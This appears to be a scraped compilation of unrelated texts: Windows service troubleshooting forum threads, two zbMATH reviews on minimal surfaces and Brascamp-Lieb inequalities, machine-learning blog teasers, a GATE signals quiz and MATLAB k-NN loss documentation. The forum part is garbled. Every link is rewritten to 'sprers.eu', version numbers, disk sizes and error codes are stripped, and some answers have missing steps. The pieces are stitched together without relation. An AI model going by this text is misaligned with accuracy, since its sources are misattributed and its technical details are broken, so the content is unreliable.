"Windows Update cannot currently check for updates, because the service is not running. You may need to restart your computer"
* Restarted several times: nothing has changed
I checked in Services, and Windows Update, Background Intelligent Transfer Service and Cryptographic Services are not listed!
* I changed the settings to "Never check for updates" and then back to "Install updates automatically": nothing changed
* I ran the Malicious Software Removal Tool (sprers.eu) and it said that everything was OK, but I still can't check for updates
* I ran the download to reset the Windows Update components (sprers.eu) but I still cannot check for updates
(Nothing is in the update history)
Am really worried!
Thank you!
Hello
Have you made any changes to the computer before this problem appeared?
Method 1:
You can try running the Fix it tool and check. See the following link.
The problem with Microsoft Windows Update is not working
sprers.eu
Method 2:
You can read the following article.
Cannot install updates in Windows Vista, Windows 7, Windows Server and Windows Server R2
sprers.eu
Note: this section, method, or task contains steps that tell you how to modify the registry. However, serious problems can occur if you modify the registry incorrectly. Therefore, make sure that you proceed with caution. For added protection, back up the registry before you edit it. Then you can restore the registry if a problem occurs. For more information about how to back up and restore the registry, click on the number below to view the article in the Microsoft Knowledge Base. How to back up and restore the registry in Windows:
sprers.eu
Note: If bad sectors are detected when running the Check Disk utility, and "Attempt recovery of bad sectors" is checked during the drive error check, data in the bad sectors can be lost when recovery is attempted.
Method 3:
I also suggest that you scan your computer with the Microsoft Security Scanner, which would help us to get rid of viruses, spyware and other malicious software.
The Microsoft Safety Scanner is a free downloadable security tool that provides on-demand scanning and helps remove viruses, spyware and other malware. It works with your current antivirus software.
sprers.eu
Note: the Microsoft Safety Scanner expires 10 days after being downloaded. To restart a scan with the latest definitions of anti-malware, download and run the Microsoft Safety Scanner again.
Important: When performing analysis of the hard drive, if bad sectors are found, the scan attempts to repair them, and any data available in those sectors may be lost.
• No wireless networks found on laptop; the Windows wireless service is not running on this computer
Hello
I have a Toshiba P laptop running Vista Home Premium and a Linksys WRT54G v8 router. The WLAN light is solid and the internet light flashes on the Linksys. I have Comcast cable as my ISP.
I've seen similar problems reported. All of a sudden my wireless access stopped working, no networks are displayed, and I get the message "the Windows wireless service is not running on this computer". I am not able to restart the Windows wireless service. I can't connect to the internet on the laptop. I have a Dell PC and can access the internet there if necessary.
In the Network and Sharing Center, I see that network discovery is disabled. I can't set it to on.
Under system devices, I have the following network adapters: Intel(R) Wireless WiFi Link AGN and Realtek RTL Family PCI-E Fast Ethernet NIC (NDIS).
Help, please. I'd appreciate any help. I need a good starting point for resolution and wouldn't want to start with suggestions that fix other issues. I design financial systems and purchase online, but I'm not a technical person with regard to Vista updates, drivers, etc.
Thank you! After reviewing the responses to similar problems, can anyone suggest whether I should try one of the following: 1. Run sfc /scannow at the command prompt; I don't know what that is going to fix and do not want to make the current problem worse. 2. Download new drivers for the network adapter; I would be grateful if someone could help me find the right driver and download it. 3. Reinstall Windows Vista Home Premium SP1 from the Toshiba restore CD. I would greatly appreciate any information. Donna
Hi blondswede,
You can try running sfc /scannow to see if you have corrupted files. That won't cause further problems on your PC. After that, you want to make sure you have the latest drivers for your laptop, especially the NIC (network card) drivers. Go to the following Toshiba link for your model and download them:
sprers.eu?CT=SB&OS=&category=&MOID=&RPN=PSPB3U&modelFilter=PS&selCategory=3&selFamily=
If you're still having problems, and this emerged recently, you can try restoring your system to a point in time before the problem started, using System Restore. Here are the steps to follow:
1. Click Start, type system restore in the search box, and then click System Restore in the list programs. If you are prompted for an administrator password or a confirmation, type your password or click on continue.
2. In the System Restore dialog box, click on choose a different restore point and then click Next.
3. In the list of restore points, click a restore point created before you started having the problem, and then click Next.
4. Click Finish.
The System Restore tool
If the problem you are experiencing started occurring recently, you can use the System Restore tool to restore the computer to an earlier point in time. Using System Restore may not necessarily help you determine the cause of the problem. When you use System Restore to restore the computer to a previous state, programs and updates that you installed after the restore point are removed.
To restore the operating system to an earlier point in time, follow these steps:
The computer restarts, and system files and settings are returned to the state they were in when the restore point was created.
Let us know how it works and if you need additional assistance.
Dave D
• Windows 7 search () still does not work.
Although I have followed other forum threads on the subject and tried all the suggested solutions, Windows 7 Search still does not work for me. It will find things in Control Panel etc., but never files and documents.
Here's what I've done so far:
1. Ran the Search & Indexing troubleshooter, telling it that I can't find files or e-mail. It detects no problems.
2. In Control Panel / programs and features, I checked that Windows Search is turned on. (The Indexing Service is turned off).
3. In Control Panel / Folder Options, I checked that the search defaults are set.
4. I tried to rebuild the Index in Control Panel / Indexing Options.
5. I looked for the stray registry key mentioned here: sprers.eu; my system does not have it.
6. I checked that the folders (for example, "My Documents") have SYSTEM permissions set.
7. I tried switching to a different user account and searching, which also did not work.
8. I compared all the settings on my desktop PC (that has the problem) with my laptop, which is also running Windows 7 Home Edition, and on which the search works very well. They are all the same.
What can I try?
Hi, Rob.
I worked my way through all the tips, but could not solve the problem. (I did not stop my AV, Avast, as it is also used on my laptop, which has never had a problem.) Finally I, reluctantly, created a new profile and copied all my files across, and search now works as it should.
Best regards
Richard
• Windows Diagnostics Policy service is not running
The Windows Diagnostics Policy service is not running
Original title: Network wireless adapter NIC Ethernet network device
Hello
• What were the changes made before the problem occurred?
• When do you receive this error message?
I suggest you try the given steps and check if they help.
Method 1: Try the steps from the link below
sprers.eu?T1=Tab03
Method 2: Try resetting the Transmission Control Protocol / Internet Protocol (TCP/IP) stack.
The reset command is available in the IP context of the NetShell (netsh) utility. Follow these steps to use the reset command to reset TCP/IP manually:
1. To open a command prompt, click Start, then click Run. Copy and paste (or type) the following command in the Open box, and then press ENTER: cmd
2. At the command prompt, copy and paste (or type) the following command and then press ENTER:
netsh int ip reset c:\resetlog.txt
Note: If you do not specify a directory path for the log file, use the following command:
netsh int ip reset resetlog.txt
3. Restart the computer.
Change TCP/IP settings
sprers.eu
Method 3: If this does not work, uninstall and reinstall the network adapter
To uninstall the drivers, follow the steps below:
1. Click Start, type Device Manager in the Start search box and press ENTER. Click Continue. The Device Manager dialog box appears. If you are prompted for an administrator password or a confirmation, type the password or click Continue.
2. In the list of device types, expand Network adapters, and then look for the specific device.
3. Right-click the device and then click Properties.
4. Click the Driver tab.
5. Click Uninstall.
6. Click OK.
Restart the computer; the default drivers will be installed.
• Windows could not start the IKE and Authip IPsec keying service modules on the local computer. Error the dependency service does not exist or has been marked for deletion.
Hi, I'm trying to start the IKE and AuthIP service from the Services screen but I get this error:
Windows could not start the IKE and Authip IPsec keying service modules on the local computer. Error the dependency service does not exist or has been marked for deletion.
original title: ike and authip error the dependency service does not exist or has been marked for deletion
Hello
Do you remember making any changes to the computer before the issue appeared?
You can follow the below methods:
Method 1: Restart Windows and try to start the Security Center service.
If you still receive the same error, make sure that the WMI service is launched and running:
(a) Click Start, click Run, and then type services.msc
(b) double-click Windows Management Instrumentation
(c) set its startup type to Automatic
(d) click Start to start the service, and then click OK
(e) restart Windows.
Method 2: Restart the service
Windows logs an error if the IKE and AuthIP IPsec Keying Modules service or driver fails to start, or if it terminates unexpectedly.
To restart the IKE and AuthIP IPsec Keying Modules service:
To perform this procedure, you must have membership in the local Administrators group, or you must have been delegated the appropriate authority.
(a) Restart the service. You can do this from a command prompt or in the Services snap-in of the Microsoft Management Console (MMC). Do one of the following:
· Start an administrative command prompt. Click Start, click All Programs, click Accessories, right-click Command Prompt, and then click Run as administrator. At the command prompt, run the command net start ikeext.
· Click Start, type services.msc in the Search box and press ENTER. In the Name column of the Services snap-in, right-click IKE and AuthIP IPsec Keying Modules, and then click Start.
(b) if the attempt to restart the service fails, restart the computer. This forces all related and dependent services to restart.
(c) if the error persists after restarting the computer, then the executable files for the driver or service may be damaged, and the operating system must be reinstalled.
Note:
You can check that the IKE and AuthIP IPsec Keying Modules (IKEEXT) service runs by using the Component Services Microsoft Management Console (MMC) or the net start command line tool.
You can check the link: sprers.eu (WS) .aspx
Method 3: Run a scan of the System File Checker.
sprers.eu
Hope this helps.
• Error / base OS Windows 8 / Bluetooth service does not start
Error / base OS Windows 8 / Bluetooth service does not start. I tried services.msc -> selecting Bluetooth Support Service -> Properties -> Log On -> This account: (Administrator) / (NT AUTHORITY\LocalService), but nothing works. I have searched a lot about this problem, but there is no solution for the built-in basic Windows 8 version that I have, only for Win 7 and Windows Server.
Now when I click to start the Bluetooth support service it always says error
Hello
Please, try the steps here to solve this problem:
sprers.eu
The hotfix applies to Windows 8 too, and you only need to put NT AUTHORITY\LocalService in the service's Log On properties.
Hope this helps, good luck :)
• Windows Defender service does not start on Windows 7
On my laptop, Windows Defender is no longer in effect. It shows the message: the service does not start. When I manually try to start Defender, the message is: file not found!
I can't remove Defender, and the update no longer works.
Does anyone know a solution?
Hello
Go to Control Panel - System and Security - Administrative Tools - Services. Find Windows Defender and double-click it. Then choose the automatic start option and click Apply. Turn it back on.
sprers.eu
• Windows 7, update services does not work
I have a problem updating software in Windows 7.
I have an HP G72 laptop.
I replaced my hard drive with a GB Western Digital drive.
I made an image of the C partition (it is 3 months old, installed from the recovery partition; new updates worked after that).
The new hard disk, however, does not get any possible Windows updates (the bar on the left is red).
After that, I reinstalled the original image from when the laptop was new (DVD image). Same result with updates.
Checked the status of services: Windows Update is started and in automatic mode.
Downloaded the Windows System Update Readiness tool to resolve the error (Windows6.1-KB-v3-x64). When installing, I get the error 0xc, so I'm not able to install this software.
Looked for errors in the sprers.eu log: found "cannot read the time value RptTime from the registry. [HRESULT = 0x ERROR_NOT_FOUND]"
Did a clean boot, without result.
Does anyone know a solution to this problem?
Thank you.
Ed.
Windows 7 update service not working: RESOLVED.
The problem occurs when you change your hard drive for a bigger one; in my case a GB Western Digital WD hard drive.
To get Windows automatic updates working again you need to update the Intel Rapid Storage Technology driver. It will not be updated when you have Intel check your drivers! For me, only version worked. This driver can be found at sprers.eu.
Versions available at sprers.eu?lang=eng&ProductFamily=Software+Products&ProductLine=Chipset+Software&ProductProduct=Intel%c2%ae+Rapid+Storage+Technology+(Intel%c2%ae+RST) did not work for me (I tried the version from 08/08/). Why the later version does not work is not clear to me.
Good luck solving yours; it took me two weeks to find this.
Ed.
|
|
# zbMATH — the first resource for mathematics
Minimal surfaces in $$M^2\times \mathbb{R}$$. (English) Zbl 1036.53008
This work is about minimal surfaces in the product of a 2-dimensional Riemannian surface $$M$$ with the real line $$\mathbb{R}$$. Here $$M$$ is either (a) the 2-sphere or (b) the hyperbolic plane or (c) a Riemannian surface with a complete non-negative curvature metric. The examples of such minimal surfaces in this paper generally are constructed using Plateau techniques, and the examples given include analogues to 1) Scherk’s periodic minimal surfaces 2) unduloids (found by Pedrosa and Ritore, but proven to exist by a different method here) and 3) helicoids. Some minimal surfaces of higher genus are also found.
There are also a fair number of general results about such minimal surfaces; we list those results here that can be stated without many technical details (although the more technical results are also interesting):
1) If $$M$$ is the round sphere, then the only compact minimal surfaces in $$M\times \mathbb{R}$$ are of the form $$M \times t$$ for some fixed $$t\in \mathbb{R}$$.
2) If $$M$$ is compact and the minimal surface is topologically a punctured disk, then it is also conformally a punctured disk (and more specific information about the conformal parametrization is given).
3) If $$M$$ is the round sphere and the minimal surface is properly embedded with finite topology, then either it has exactly one top end and one bottom end or it is of the form $$M \times t$$ for some fixed $$t\in \mathbb{R}$$.
4) If $$M$$ is the round sphere and there are two given properly embedded minimal surfaces in $$M\times \mathbb{R}$$, then the two surfaces either intersect or are of the form $$M \times t_1$$ and $$M\times t_2$$ for some fixed $$t_1$$ and $$t_2\in \mathbb{R}$$.
5) If $$M$$ is the round sphere, then a properly immersed minimal surface meets every flat vertical annulus.
6) If $$M$$ has nonnegative curvature, then a properly immersed minimal surface in $$M\times \mathbb{R}$$ is parabolic.
7) If $$M$$ is the hyperbolic plane, then any properly immersed minimal surface in a half-space $$M\times [0,\infty)$$ must be of the form $$M\times t$$ for some fixed $$t\in \mathbb{R}$$.
8) When $$M$$ is the hyperbolic plane, there are some results on the existence of minimal graphs with given boundary, including a Jenkins-Serrin type result.
##### MSC:
53A10 Minimal surfaces in differential geometry, surfaces with prescribed mean curvature
35J99 Elliptic equations and elliptic systems
49Q05 Minimal surfaces and optimization
Full Text:
|
|
## Otsu’s method for image thresholding explained and implemented
The process of separating the foreground pixels from the background is called thresholding. There are many ways of achieving optimal thresholding, and one of them is Otsu's method, proposed by Nobuyuki Otsu. Otsu's method [1] is a variance-based technique that finds the threshold value where the weighted variance between the foreground and background …
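A minimal NumPy sketch of the idea (my own illustration, not the post's code): scan all 256 candidate thresholds of an 8-bit image and keep the one that maximizes the weighted between-class variance.

```python
import numpy as np

def otsu_threshold(image):
    """Return the 8-bit threshold maximizing between-class variance."""
    hist, _ = np.histogram(image.ravel(), bins=256, range=(0, 256))
    p = hist / hist.sum()                      # gray-level probabilities
    levels = np.arange(256)
    best_t, best_var = 0, 0.0
    for t in range(1, 256):
        w0, w1 = p[:t].sum(), p[t:].sum()      # class weights
        if w0 == 0 or w1 == 0:
            continue
        mu0 = (levels[:t] * p[:t]).sum() / w0  # class means
        mu1 = (levels[t:] * p[t:]).sum() / w1
        var_between = w0 * w1 * (mu0 - mu1) ** 2
        if var_between > best_var:
            best_var, best_t = var_between, t
    return best_t

img = np.random.randint(0, 256, (64, 64))      # stand-in for a real image
mask = img >= otsu_threshold(img)              # foreground mask
```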
## Linear Regression using Gradient Descent Algorithm
Gradient descent is an optimization method used to find the minimum value of a function by iteratively updating the parameters of the function. Parameters refer to coefficients in linear regression and weights in neural networks. In a linear regression problem, we find a model that gives an approximate representation of our dataset. In the below …
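As a rough sketch of what such a post typically derives (the data and learning rate below are my assumptions), here is batch gradient descent fitting a slope and intercept by following the gradient of the mean squared error:

```python
import numpy as np

# Toy data: y ~ 2x + 1 plus noise (values assumed for illustration).
rng = np.random.default_rng(0)
x = rng.uniform(0, 10, 100)
y = 2.0 * x + 1.0 + rng.normal(0.0, 0.5, 100)

w, b = 0.0, 0.0   # slope and intercept to learn
lr = 0.01         # learning rate
for _ in range(2000):
    y_hat = w * x + b
    dw = 2 * np.mean((y_hat - y) * x)   # d(MSE)/dw
    db = 2 * np.mean(y_hat - y)         # d(MSE)/db
    w -= lr * dw
    b -= lr * db

print(w, b)   # should approach 2 and 1
```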
## Mathematics of Principal component analysis
Principal component analysis is a method used to reduce the number of dimensions in a dataset without losing much information. It’s used in many fields such as face recognition and image compression, and is a common technique for finding patterns in data and also in the visualization of higher dimensional data. PCA is all about …
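A compact sketch of the core computation (centering, covariance, eigendecomposition); refinements such as whitening or SVD-based variants are omitted:

```python
import numpy as np

def pca(X, k):
    """Project X (n samples x d features) onto its top-k principal components."""
    Xc = X - X.mean(axis=0)                   # center the data
    cov = np.cov(Xc, rowvar=False)            # d x d covariance matrix
    vals, vecs = np.linalg.eigh(cov)          # eigh: for symmetric matrices
    order = np.argsort(vals)[::-1]            # sort by variance explained
    components = vecs[:, order[:k]]
    return Xc @ components                    # reduced representation

X = np.random.default_rng(1).normal(size=(200, 5))
Z = pca(X, 2)   # shape (200, 2)
```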
## Evaluating the fitness of a model with a cost function
Previously we derived a simple linear regression model for our pizza price dataset. We built a model that predicted a price of $13.68 for a 12 inch pizza. When the same model is used to predict the price of an 8 inch pizza, we get $9.78, which is around $0.78 more than the known price of $9. …
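To make the residual concrete, here is a tiny sketch; the line's coefficients are my own choice, picked only so that the line reproduces the two predictions quoted above ($9.78 at 8 inches, $13.68 at 12 inches):

```python
def predict(x, w=0.975, b=1.98):
    # Illustrative coefficients, not the ones derived in the original post.
    return w * x + b

# Known observation from the post: an 8-inch pizza costs $9.
x_known, y_known = 8, 9.0
residual = predict(x_known) - y_known        # 0.78, as in the text
squared_error = residual ** 2                # one term of the MSE cost
print(predict(12), residual, squared_error)  # 13.68  0.78  ~0.6084
```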
## Math behind Linear Regression with Python code
Simple linear regression is a statistical method you can use to study relationships between two continuous (quantitative) variables: the independent variable (x), also referred to as the predictor or explanatory variable, and the dependent variable (y), also referred to as the response or outcome. The goal of any regression model is to predict the value of y (the dependent variable) based on the …
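A short sketch of the closed-form fit such a post usually derives (the data points are made up for illustration): the slope is cov(x, y)/var(x) and the intercept follows from the means.

```python
import numpy as np

x = np.array([6.0, 8.0, 10.0, 14.0, 18.0])   # assumed example data
y = np.array([7.0, 9.0, 13.0, 17.5, 18.0])

slope = np.cov(x, y, bias=True)[0, 1] / np.var(x)
intercept = y.mean() - slope * x.mean()
print(slope, intercept)   # fitted line: y_hat = slope * x + intercept
```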
## Understanding Binomial Distribution using Python
Binomial distribution is used to understand the probability of a particular outcome in repeated independent trials. Each trial results in either success or failure. The trials are independent, as the outcome of the previous trial has no effect on the next trial, as happens in the tossing of coins. If we flip a coin, it would either …
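A one-function sketch of the binomial probability mass function, applied to the coin-flip example above:

```python
from math import comb

def binomial_pmf(k, n, p):
    """P(exactly k successes in n independent trials, success probability p)."""
    return comb(n, k) * p**k * (1 - p)**(n - k)

# Probability of exactly 5 heads in 10 fair coin flips.
print(binomial_pmf(5, 10, 0.5))   # ~0.2461
```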
## Poisson distribution with Python
A Poisson distribution is the probability distribution of independent occurrences in an interval. Poisson distribution is used for count-based distributions where these events happen with a known average rate and independently of the time since the last event. For example, If the average number of cars that cross a particular street in a day is 25, …
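A minimal sketch using the example from the teaser above (25 cars per day on average):

```python
from math import exp, factorial

def poisson_pmf(k, lam):
    """P(k events in an interval when events occur at average rate lam)."""
    return lam**k * exp(-lam) / factorial(k)

# If on average 25 cars cross the street per day, the chance of exactly 20:
print(poisson_pmf(20, 25))
```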
## Markov chain explained in simple words
A Markov chain is a probabilistic process used to predict the next step based on the probabilities of the existing related states. It's called a chain because the probability of the next step is dependent on the other steps in the group. For example, if the weather is cloudy then it's highly likely that it might rain (The next …
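A small simulation sketch of the weather example; the transition probabilities are illustrative, chosen only to echo "cloudy, so rain is likely next":

```python
import numpy as np

states = ["sunny", "cloudy", "rainy"]
P = np.array([[0.7, 0.2, 0.1],    # transitions from sunny
              [0.2, 0.3, 0.5],    # from cloudy: rain is most likely next
              [0.3, 0.3, 0.4]])   # from rainy

rng = np.random.default_rng(42)
state = 1                          # start cloudy
for _ in range(5):                 # simulate the next five steps
    state = rng.choice(3, p=P[state])
    print(states[state])
```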
|
|
# Signals and Systems for GATE EC Quiz 1
Here is Signals and Systems for GATE EC Quiz 1 to help you prepare for your upcoming GATE exam. The GATE EC paper has several subjects, each one as important as the last. However, one of the most important subjects in GATE EC is Signals and Systems. The subject is vast, but practice makes tackling it easy.
This quiz contains important questions that match the pattern of the GATE exam. Check your preparation level in every chapter of Signals and Systems for GATE. Simply take the quiz and compare your rank. Learn about control systems, the feedback principle, and more.
Signals and Systems for GATE EC Quiz 1
Que. 1
A real-valued signal x(t), band-limited to $$\left| f \right| < \frac{\omega }{2}$$, is passed through an LTI system whose frequency response is
$$H\left( f \right) = \begin{cases} e^{ - j4\pi f}, & \left| f \right| < \frac{\omega }{2} \\ 0, & \left| f \right| > \frac{\omega }{2} \end{cases}$$
The output of the system is
1.
$$x(t+4)$$
2.
$$x(t-4)$$
3.
$$x(t+2)$$
4.
$$x(t-2)$$
Que. 2
The unilateral Laplace transform of $$f(t)$$ is $$F\left( s \right) = \frac{1}{{{s^2} + s + 1}}$$. Which one of the following is the unilateral Laplace transform of $$g(t)=tf(t)$$?
1.
$$\frac{{ - s}}{{{{\left( {{s^2} + s + 1} \right)}^2}}}$$
2.
$$\frac{-({2s + 1})}{{{{\left( {{s^2} + s + 1} \right)}^2}}}$$
3.
$$\frac{{ s}}{{{{\left( {{s^2} + s + 1} \right)}^2}}}$$
4.
$$\frac{({2s + 1})}{{{{\left( {{s^2} + s + 1} \right)}^2}}}$$
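For reference, a worked check (not part of the original quiz), using the multiplication-by-$t$ property of the Laplace transform:
$$\mathcal{L}\{t\,f(t)\} = -\frac{dF(s)}{ds} = -\frac{d}{ds}\!\left(\frac{1}{s^{2}+s+1}\right) = \frac{2s+1}{\left(s^{2}+s+1\right)^{2}},$$
i.e. option 4.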
Que. 3
A stable LTI system has transfer function $$H\left( s \right) = \frac{1}{{{s^2} + s - 6}}$$. To make this system causal it needs to be cascaded with another LTI system having transfer function $$\rm{H_1(s)}$$. Correct choice for $$\rm{H_1(s)}$$ is
1.
$$\rm{s+3}$$
2.
$$\rm{s-2}$$
3.
$$\rm{s-6}$$
4.
$$\rm{s+1}$$
Que. 4
The LTI system is given as $$y\left[ n \right] = \alpha y\left[ {n - 1} \right] + \beta x\left[ n \right]$$
If the impulse response satisfies $$\mathop \sum \limits_{n = 0}^\infty h\left[ n \right] = 2,$$ the relationship between $$\alpha$$ and $$\beta$$ is:
1.
$$\;\alpha = 1 - \frac{\beta }{2}$$
2.
$$\alpha = 1 + \frac{\beta }{2}$$
3.
$$\alpha = 2\beta$$
4.
$$\;\alpha = - 2\beta$$
Que. 5
Which of the following statements is $$\rm{\textbf{not true}}$$ for a continuous-time causal and stable LTI system?
1.
All poles must lie on left side of jω – axis
2.
Zeros of the system can lie anywhere in s – plane
3.
All poles must lie within |s|=1
4.
All the roots of the characteristics equation must be located on left side of jω axis
|
|
# zbMATH — the first resource for mathematics
Asymmetric covariance estimates of Brascamp-Lieb type and related inequalities for log-concave measures. (English. French summary) Zbl 1270.26016
Summary: An inequality of Brascamp and Lieb provides a bound on the covariance of two functions with respect to log-concave measures. The bound estimates the covariance by the product of the $$L^{2}$$ norms of the gradients of the functions, where the magnitude of the gradient is computed using an inner product given by the inverse Hessian matrix of the potential of the log-concave measure. G. Menz and F. Otto [“Uniform logarithmic Sobolev inequalities for conservative spin systems with super-quadratic single-site potential”, Preprint (2011)] proved a variant of this with the two $$L^{2}$$ norms replaced by $$L^{1}$$ and $$L^{\infty}$$ norms, but only for $$\mathbb{R}^{1}$$. We prove a generalization of both by extending these inequalities to $$L^{p}$$ and $$L^{q}$$ norms and on $$\mathbb{R}^{n}$$, for any $$n\geq1$$. We also prove an inequality for integrals of divided differences of functions in terms of integrals of their gradients.
##### MSC:
26D10 Inequalities involving derivatives and differential and integral operators
##### Keywords:
convexity; log-concavity; Poincaré inequality
Full Text:
##### References:
[1] S. G. Bobkov. Isoperimetric and analytic inequalities for log-concave probability measures. Ann. Probab. 27 (1999) 1903-1921. · Zbl 0964.60013
[2] S. Bobkov and M. Ledoux. From Brunn-Minkowski to Brascamp-Lieb and to logarithmic Sobolev inequalities. Geom. Funct. Anal. 10 (2000) 1028-1052. · Zbl 0969.26019
[3] T. Bodineau and B. Helffer. The log-Sobolev inequalities for unbounded spin systems. J. Funct. Anal. 166 (1999) 168-178. · Zbl 0972.82035
[4] H. J. Brascamp and E. H. Lieb. On extensions of the Brunn-Minkowski and Prékopa-Leindler theorems, including inequalities for log-concave functions, and with an application to the diffusion equation. J. Funct. Anal. 22 (1976) 366-389. · Zbl 0334.26009
[5] D. Cordero-Erausquin. On Berndtsson’s generalization of Prékopa’s theorem. Math. Z. 249 (2005) 401-410. · Zbl 1079.32020
[6] N. Grunewald, F. Otto, C. Villani and M. G. Westdickenberg. A two-scale approach to logarithmic Sobolev inequalities and the hydrodynamic limit. Ann. Inst. Henri Poincaré Probab. Stat. 45 (2009) 302-351. · Zbl 1179.60068
[7] O. Guédon. Kahane-Khinchine type inequalities for negative exponent. Mathematika 46 (1999) 165-173. · Zbl 0965.26011
[8] L. Hörmander. $$L^{2}$$ estimates and existence theorems for the $$\bar{\partial}$$ operator. Acta Math. 113 (1965) 89-152. · Zbl 0158.11002
[9] R. Kannan, L. Lovász and M. Simonovits. Isoperimetric problems for convex bodies and a localization lemma. Discrete Comput. Geom. 13 (1995) 541-559. · Zbl 0824.52012
[10] C. Landim, G. Panizo and H. T. Yau. Spectral gap and logarithmic Sobolev inequality for unbounded conservative spin systems. Ann. Inst. Henri Poincaré Probab. Stat. 38 (2002) 739-777. · Zbl 1022.60087
[11] E. H. Lieb and M. Loss. Analysis, 2nd edition. Amer. Math. Soc., Providence, RI, 2001. · Zbl 0966.26002
[12] G. Menz and F. Otto. Uniform logarithmic Sobolev inequalities for conservative spin systems with super-quadratic single-site potential. Preprint, 2011. · Zbl 1282.60096
[13] F. Otto and M. G. Reznikoff. A new criterion for the logarithmic Sobolev inequality and two applications. J. Funct. Anal. 243 (2007) 121-157. · Zbl 1109.60013
|
|
loss
Loss of k-nearest neighbor classifier
Description
L = loss(mdl,Tbl,ResponseVarName) returns a scalar representing how well mdl classifies the data in Tbl when Tbl.ResponseVarName contains the true classifications. If Tbl contains the response variable used to train mdl, then you do not need to specify ResponseVarName.
When computing the loss, the loss function normalizes the class probabilities in Tbl.ResponseVarName to the class probabilities used for training, which are stored in the Prior property of mdl.
The meaning of the classification loss (L) depends on the loss function and weighting scheme, but, in general, better classifiers yield smaller classification loss values. For more details, see Classification Loss.
L = loss(mdl,Tbl,Y) returns a scalar representing how well mdl classifies the data in Tbl when Y contains the true classifications.
When computing the loss, the loss function normalizes the class probabilities in Y to the class probabilities used for training, which are stored in the Prior property of mdl.
L = loss(mdl,X,Y) returns a scalar representing how well mdl classifies the data in X when Y contains the true classifications.
When computing the loss, the loss function normalizes the class probabilities in Y to the class probabilities used for training, which are stored in the Prior property of mdl.
L = loss(___,Name,Value) specifies options using one or more name-value pair arguments in addition to the input arguments in previous syntaxes. For example, you can specify the loss function and the classification weights.
Note
If the predictor data in X or Tbl contains any missing values and LossFun is not set to "classifcost", "classiferror", or "mincost", the loss function can return NaN. For more details, see loss can return NaN for predictor data with missing values.
Examples
Create a k-nearest neighbor classifier for the Fisher iris data, where k = 5.
Load the Fisher iris data set.
load fisheriris
Create a classifier for five nearest neighbors.
mdl = fitcknn(meas,species,'NumNeighbors',5);
Examine the loss of the classifier for a mean observation classified as 'versicolor'.
X = mean(meas);
Y = {'versicolor'};
L = loss(mdl,X,Y)
L = 0
All five nearest neighbors classify as 'versicolor'.
Input Arguments
k-nearest neighbor classifier model, specified as a ClassificationKNN object.
Sample data used to train the model, specified as a table. Each row of Tbl corresponds to one observation, and each column corresponds to one predictor variable. Optionally, Tbl can contain one additional column for the response variable. Multicolumn variables and cell arrays other than cell arrays of character vectors are not allowed.
If Tbl contains the response variable used to train mdl, then you do not need to specify ResponseVarName or Y.
If you train mdl using sample data contained in a table, then the input data for loss must also be in a table.
Data Types: table
Response variable name, specified as the name of a variable in Tbl. If Tbl contains the response variable used to train mdl, then you do not need to specify ResponseVarName.
You must specify ResponseVarName as a character vector or string scalar. For example, if the response variable is stored as Tbl.response, then specify it as 'response'. Otherwise, the software treats all columns of Tbl, including Tbl.response, as predictors.
The response variable must be a categorical, character, or string array, logical or numeric vector, or cell array of character vectors. If the response variable is a character array, then each element must correspond to one row of the array.
Data Types: char | string
Predictor data, specified as a numeric matrix. Each row of X represents one observation, and each column represents one variable.
Data Types: single | double
Class labels, specified as a categorical, character, or string array, logical or numeric vector, or cell array of character vectors. Each row of Y represents the classification of the corresponding row of X.
Data Types: categorical | char | string | logical | single | double | cell
Name-Value Arguments
Specify optional pairs of arguments as Name1=Value1,...,NameN=ValueN, where Name is the argument name and Value is the corresponding value. Name-value arguments must appear after other arguments, but the order of the pairs does not matter.
Before R2021a, use commas to separate each name and value, and enclose Name in quotes.
Example: loss(mdl,Tbl,'response','LossFun','exponential','Weights','w') returns the weighted exponential loss of mdl classifying the data in Tbl. Here, Tbl.response is the response variable, and Tbl.w is the weight variable.
Loss function, specified as the comma-separated pair consisting of 'LossFun' and a built-in loss function name or a function handle.
• The following list gives the available loss functions, by value:
'binodeviance': Binomial deviance
'classifcost': Observed misclassification cost
'classiferror': Misclassified rate in decimal
'exponential': Exponential loss
'hinge': Hinge loss
'logit': Logistic loss
'mincost': Minimal expected misclassification cost (for classification scores that are posterior probabilities)
'mincost' is appropriate for classification scores that are posterior probabilities. By default, k-nearest neighbor models return posterior probabilities as classification scores (see predict).
• You can specify a function handle for a custom loss function using @ (for example, @lossfun). Let n be the number of observations in X and K be the number of distinct classes (numel(mdl.ClassNames)). Your custom loss function must have this form:
function lossvalue = lossfun(C,S,W,Cost)
• C is an n-by-K logical matrix with rows indicating the class to which the corresponding observation belongs. The column order corresponds to the class order in mdl.ClassNames. Construct C by setting C(p,q) = 1, if observation p is in class q, for each row. Set all other elements of row p to 0.
• S is an n-by-K numeric matrix of classification scores. The column order corresponds to the class order in mdl.ClassNames. The argument S is a matrix of classification scores, similar to the output of predict.
• W is an n-by-1 numeric vector of observation weights. If you pass W, the software normalizes the weights to sum to 1.
• Cost is a K-by-K numeric matrix of misclassification costs. For example, Cost = ones(K) - eye(K) specifies a cost of 0 for correct classification and 1 for misclassification.
• The output argument lossvalue is a scalar.
For more details on loss functions, see Classification Loss.
Data Types: char | string | function_handle
Observation weights, specified as the comma-separated pair consisting of 'Weights' and a numeric vector or the name of a variable in Tbl.
If you specify Weights as a numeric vector, then the size of Weights must be equal to the number of rows in X or Tbl.
If you specify Weights as the name of a variable in Tbl, the name must be a character vector or string scalar. For example, if the weights are stored as Tbl.w, then specify Weights as 'w'. Otherwise, the software treats all columns of Tbl, including Tbl.w, as predictors.
loss normalizes the weights so that observation weights in each class sum to the prior probability of that class. When you supply Weights, loss computes the weighted classification loss.
Example: 'Weights','w'
Data Types: single | double | char | string
Algorithms
Classification Loss
Classification loss functions measure the predictive inaccuracy of classification models. When you compare the same type of loss among many models, a lower loss indicates a better predictive model.
Consider the following scenario.
• L is the weighted average classification loss.
• n is the sample size.
• For binary classification:
• yj is the observed class label. The software codes it as –1 or 1, indicating the negative or positive class (or the first or second class in the ClassNames property), respectively.
• f(Xj) is the positive-class classification score for observation (row) j of the predictor data X.
• mj = yjf(Xj) is the classification score for classifying observation j into the class corresponding to yj. Positive values of mj indicate correct classification and do not contribute much to the average loss. Negative values of mj indicate incorrect classification and contribute significantly to the average loss.
• For algorithms that support multiclass classification (that is, K ≥ 3):
• yj* is a vector of K – 1 zeros, with 1 in the position corresponding to the true, observed class yj. For example, if the true class of the second observation is the third class and K = 4, then y2* = [0 0 1 0]′. The order of the classes corresponds to the order in the ClassNames property of the input model.
